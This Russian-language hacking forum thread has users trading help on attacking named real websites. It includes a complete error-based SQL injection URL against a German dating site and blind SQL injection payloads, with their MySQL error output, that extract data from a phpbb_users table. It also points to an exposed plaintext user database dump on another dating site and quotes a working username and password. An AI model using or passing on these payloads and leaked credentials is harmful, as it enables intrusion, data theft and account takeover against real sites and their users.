Ваши вопросы по уязвимостям.

можно примерчик? заранее спс

 

наоборот ты используе больше чем 1 ров, надо 1, добавиль лимит

 

да возможно, сливал уже через скули. Отдельный многопоточный скрипт на перле решил мою проблему. если что могу помочь пиши асю в пм.

 

http://www.singles-4you.de/im_show.php?rid=111-222'
не как получается её продолжить подскажите!

 

лови

http://www.singles-4you.de/im_show.php?rid=111222'+and+'1'='1'))+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+

 

осматривал сайт на sql иньекцию ничего не нашёл
в а админке набрал логин и пароль как ' выдало сообщение об mysql ошибке
кто что думает? такое может отображаться при дырке или реагирует на кавычку так?
вводя другие логины с паролем ошибки нет

 

я думаю что пошел бы ка ты читать про иньекции в пост запросе и не постил всякую дребедень

 

завязывай с милыми наездами
я знаю что это пост запрос
дело в том что ошибка только при кавычке а вот при запросе 3-1 странички все одинаковые т.к там особо то и нет ничего по чём можно определить различие страниц, поле логин и пароль

 

ну покажи как ты запрос делаешь постом 3-1

 

Немножко не по теме, извините!
Кто знает по каким причинам не работает inj3kt0r.com ? Последний раз я заходил туда месяца 3-4 назад...

 

http://whois.domaintools.com/inj3ct0r.com
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.

 

Подозрительно все это, такой ресурс хороший...Ну все равно спасибо за ответ!

 

делаю запрос (id*IF(ASCII(SUBSTRING(version(),1,1))=53,1,-1)) все ок, ясно что версия 5

но когда пытаюсь выбрать из базы:

(id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1,1))=53,1,-1))

вылазит ошибка


Invalid SQL: SELECT * FROM `arts` WHERE id = (id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1,1))=53,1,-1))

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select+1+from+phpbb_users,1,1))=53,1,-1))' at line 1

в чем проблема?

 

InferNo23

подзапрос select надо взять в скобки

SUBSTRING((select+1+from+phpbb_users+limit+0,1),1 ,1))=53,1,-1))

 

(id*IF(ASCII(SUBSTRING((select+1+from+phpbb_users+limit+0,1),1,1))=53,1,-1))


теперь

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from+phpbb_users+limit+0,1),1,1))=53,1,-1))' at line 1

 

Вродь дернули на 1337db.com, но сайт тоже не отвечает.
Следите за ихним твиттером, возможно, объявятся еще.

 

InferNo23

так закрытыми глазами ниче сказать не могу, если не жалко скинь сайт, посмотрим.

ах да забыл сказать, если там видна ошибка мускула, ты не пробовал проводить error based иньекцию?
зачем посимвольно..

 

http://www.tringuladating.com//db/
Что это, и с чем его едят-))) Просьба не смеяться- я учусь только.

 

странно- там дамп БД юзерей в плейнтексте trindating_user.sql.gz скачивай и заходи под любым ну как пример meetmeone:meetmeone ,у большинства пароль просто password из чего делаем вывод что наполнял его сам админ и больше полофины юзерей- фейки

 

А чем и как правильно скачать? Он то и блокнотом открывается, но как то в перемешку, как его обработать?